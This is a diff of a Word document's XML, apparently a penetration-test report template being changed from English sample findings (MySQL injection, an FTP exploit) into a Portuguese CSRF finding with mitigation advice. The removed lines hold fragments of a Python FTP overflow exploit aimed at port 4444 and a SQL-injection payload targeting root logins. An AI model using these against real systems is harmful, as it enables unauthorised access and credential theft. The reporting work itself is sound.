-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> to port 4444 on the remote machine."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>except:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nCould</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> not Connect to FTP Server."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>try:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftp.transfercmd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">("STOR " + buffer) </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>except:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nDone</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>."</w:t>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5158,78 +3960,57 @@
               <w:spacing w:line="360" w:lineRule="auto"/>
               <w:jc w:val="both"/>
               <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Screenshot Here:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
+                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
                 <w:noProof/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2123DFDE" wp14:editId="1A02D0A7">
-                  <wp:extent cx="4638675" cy="2419350"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="1073741827" name="officeArt object" descr="image.png"/>
-                  <wp:cNvGraphicFramePr/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2003489B" wp14:editId="7EEC3E3E">
+                  <wp:extent cx="5657945" cy="1163782"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="761945460" name="Imagem 4"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
                   <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="1073741827" name="image.png" descr="image.png"/>
+                          <pic:cNvPr id="0" name="Picture 4"/>
                           <pic:cNvPicPr>
-                            <a:picLocks noChangeAspect="1"/>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                           </pic:cNvPicPr>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId9"/>
+                          <a:blip r:embed="rId15">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
                         </pic:blipFill>
-                        <pic:spPr>
+                        <pic:spPr bwMode="auto">
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="4638679" cy="2419352"/>
+                            <a:ext cx="5741327" cy="1180933"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
                           </a:prstGeom>
-                          <a:ln w="12700" cap="flat">
+                          <a:noFill/>
+                          <a:ln>
                             <a:noFill/>
-                            <a:miter lim="400000"/>
                           </a:ln>
-                          <a:effectLst/>
                         </pic:spPr>
                       </pic:pic>
                     </a:graphicData>
@@ -5280,9 +4061,27 @@
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
+              <w:t>Vulnerabili</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>dade</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5292,7 +4091,27 @@
                 <w:szCs w:val="24"/>
                 <w:u w:color="4F81BD"/>
               </w:rPr>
-              <w:t>MySQL Injection</w:t>
+              <w:t>CSRF – Cross</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:u w:color="4F81BD"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Site</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:u w:color="4F81BD"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Request Forgery</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5307,17 +4126,41 @@
             </w:pPr>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>IP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>’s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> do Sistema</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
               </w:rPr>
-              <w:t xml:space="preserve">System Vulnerable: </w:t>
+              <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>172.16.203.135</w:t>
+              <w:t>192.168.236.130</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5334,31 +4177,31 @@
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Explanation</w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Explicação</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve">: A custom web application identified was prone to SQL Injection attacks. When performing the penetration test, John noticed error-based MySQL Injection on the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>taxid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>O</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve"> query string parameter. While enumerating table data, John was able to successfully extract login and password credentials that were unencrypted that also matched username and password accounts for the root user account on the operating system. This allowed for a successful breach of the Linux-based operating system as well as all data contained on the system.</w:t>
+              <w:t xml:space="preserve">corre quando um atacante engana um usuário autenticado para realizar ações não autorizadas em um aplicativo web no qual o usuário está logado. Isso é feito induzindo o usuário a executar solicitações não desejadas sem seu conhecimento. Um exemplo seria a inserção de código malicioso em uma página web visitada pelo usuário, levando o navegador a enviar solicitações falsificadas para o aplicativo web autenticado. </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5374,32 +4217,34 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Fix</w:t>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Mitigação</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve">: Since this is a custom web application, a specific update will not properly solve this issue. The application will need to be programmed to properly sanitize user-input data, ensure that the user is running </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>off of</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve"> a limited user account, and that any sensitive data stored within the SQL database is properly encrypted. Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them.</w:t>
+              <w:t>Para mitigar o CSRF, as aplicações geralmente utilizam tokens anti-CSRF incorporados em formulários para verificar a legitimidade das solicitações.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5416,8 +4261,17 @@
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Severity: </w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Ameaça</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5426,7 +4280,7 @@
                 <w:color w:val="FF0000"/>
                 <w:u w:color="FF0000"/>
               </w:rPr>
-              <w:t>Critical</w:t>
+              <w:t>Crítica</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5435,7 +4289,6 @@
               <w:spacing w:line="360" w:lineRule="auto"/>
               <w:jc w:val="both"/>
               <w:rPr>
-                <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
               </w:rPr>
             </w:pPr>
@@ -5443,8 +4296,17 @@
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Proof of Concept Code Here:</w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Prints</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t>:</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5453,138 +4315,6 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE “%root%"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="192" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="192" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-                  <w14:noFill/>
-                  <w14:prstDash w14:val="solid"/>
-                  <w14:bevel/>
-                </w14:textOutline>
-              </w:rPr>
-              <w:drawing>
-                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77F9324B" wp14:editId="23862983">
-                  <wp:simplePos x="0" y="0"/>
-                  <wp:positionH relativeFrom="column">
-                    <wp:posOffset>-44450</wp:posOffset>
-                  </wp:positionH>
-                  <wp:positionV relativeFrom="paragraph">
-                    <wp:posOffset>231140</wp:posOffset>
-                  </wp:positionV>
-                  <wp:extent cx="3625215" cy="419100"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:wrapTight wrapText="bothSides">
-                    <wp:wrapPolygon edited="0">
-                      <wp:start x="0" y="0"/>
-                      <wp:lineTo x="0" y="20618"/>
-                      <wp:lineTo x="21452" y="20618"/>
-                      <wp:lineTo x="21452" y="0"/>
-                      <wp:lineTo x="0" y="0"/>
-                    </wp:wrapPolygon>
-                  </wp:wrapTight>
-                  <wp:docPr id="3" name="Picture 3"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="3" name="Picture 3"/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId10">
-                            <a:extLst>
-                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                              </a:ext>
-                            </a:extLst>
-                          </a:blip>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3625215" cy="419100"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:anchor>
-              </w:drawing>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Screenshot Here:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="192" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5596,11 +4326,12 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="10" w:name="_Toc59959356"/>
@@ -5615,93 +4346,161 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>3.4 Sample Report – Maintaining Access</w:t>
+        <w:t xml:space="preserve">3.4 </w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Acesso Mantido</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
         <w:rPr>
           <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
